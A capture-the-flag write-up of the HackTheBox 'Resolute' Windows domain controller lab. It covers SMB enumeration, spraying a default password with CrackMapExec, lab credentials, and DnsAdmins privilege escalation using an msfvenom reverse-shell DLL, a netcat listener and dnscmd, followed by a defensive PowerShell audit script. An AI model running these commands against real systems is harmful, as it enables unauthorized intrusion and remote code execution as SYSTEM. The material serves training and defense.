Resolute Writeup — HackTheBox

REBRON SECURITY
SUDOROOT
May 31, 2020

Made by RebornSec ®

This great box was made by egre55. Without further ado, let's jump into our box.

Enumeration phase:

As usual, let's start with an Nmap scan:

PORT     STATE SERVICE      REASON          VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-29 02:41:15Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/28%Time=5ED073BE%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m57s, deviation: 4h02m29s, median: 10m56s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41231/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 26625/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-28T19:42:06-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-29T02:42:08
|_ start_date: 2020-05-29T02:17:47
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

As we can see, several ports are open:

53, 88, 135, 139, 389, 445, 464, 636, 593, 3268, 3269

Some ports are unusual, but let's start by enumerating SMB. Here is a useful link for understanding how SMB works:

https://www.samba.org/~tridge/smb2.pdf

This is the result we found after enumerating:

We got some possibly useful usernames. Let's keep digging; we found the missing piece using enum4linux:

It looks like the initial password for new users is:

Welcome123!

But using it with the user marko does not work, so we need to test it against all the other users we found:

abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach

We test them with CrackMapExec along with the password:

crackmapexec smb 10.10.10.169 -u users.txt -p pass.txt

We got the user who owns this password:

melanie:Welcome123!

And if we log in, we get our user.txt:

Root phase:

Digging through the directories, I found a hidden file containing juicy credentials:

ryan:Serv3r4Admin4cc123!

Digging through ryan's directories, we found a note left for ryan by his team:

Also, ryan is a member of the groups:

MEGABANK\Contractors

MEGABANK\DnsAdmins

Searching for a way to exploit this, I found this article:

msfvenom -p windows/x64/shell_reverse_tcp LHOST={your-ip} LPORT=4444 --platform=windows -f dll > ~/windows/privesc/plugin.dll

Then we launch our smbserver.py:

python ./smbserver.py SHARE ~/Desktop/

Then we start our netcat listener on our machine:

nc -nvlp 4444

Running this as the user ryan to catch our shell:

dnscmd.exe /config /serverlevelplugindll \\{your-ip}\share\shell.dll
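The dnscmd step above works because DnsAdmins members may set the DNS server's ServerLevelPluginDll value, which the DNS service (running as SYSTEM) loads the next time it starts. As an added defensive check that is not part of this writeup, the following PowerShell audits that registry value on a DNS server and lists who holds DnsAdmins membership; it assumes it is run as an administrator on the DNS server with the ActiveDirectory module (RSAT) installed, and the function name Test-DnsPluginDll is our own.

```powershell
# Added example: audit a Windows DNS server for a configured plugin DLL and
# review DnsAdmins membership. Not part of the original writeup.
# Assumes: run as an administrator on the DNS server itself, with the
# ActiveDirectory module (RSAT) available for the group query.

$paramsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsPluginDll {
    param([string]$Key = $paramsKey)
    $props = Get-ItemProperty -Path $Key -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue
    if (-not $props -or [string]::IsNullOrEmpty($props.ServerLevelPluginDll)) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Remote = $false }
    }
    $path = $props.ServerLevelPluginDll
    # A UNC path means the DNS service would load code straight from a network share.
    $isUnc = $path -like '\\*'
    return [pscustomobject]@{ Configured = $true; Path = $path; Remote = $isUnc }
}

$result = Test-DnsPluginDll
if ($result.Configured) {
    Write-Warning "ServerLevelPluginDll is set: $($result.Path)"
    if ($result.Remote) {
        Write-Warning 'Plugin path is a UNC share: the DNS service would load a DLL from the network.'
    }
    # Remediation if this value is not expected (then restart the DNS service
    # so the configured DLL is no longer loaded):
    #   Remove-ItemProperty -Path $paramsKey -Name 'ServerLevelPluginDll'
    #   Restart-Service -Name DNS
} else {
    Write-Output 'No ServerLevelPluginDll configured.'
}

# Who is able to set that value? Every member of DnsAdmins, nested groups included.
# Membership here should be reviewed as carefully as Domain Admins.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass |
    Format-Table -AutoSize
```

A scheduled run of this check, plus alerting on changes to that registry value, catches this technique regardless of which DLL or share is used.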

And voilà, we own the box :D

And here we got the root flag. Happy hacking!
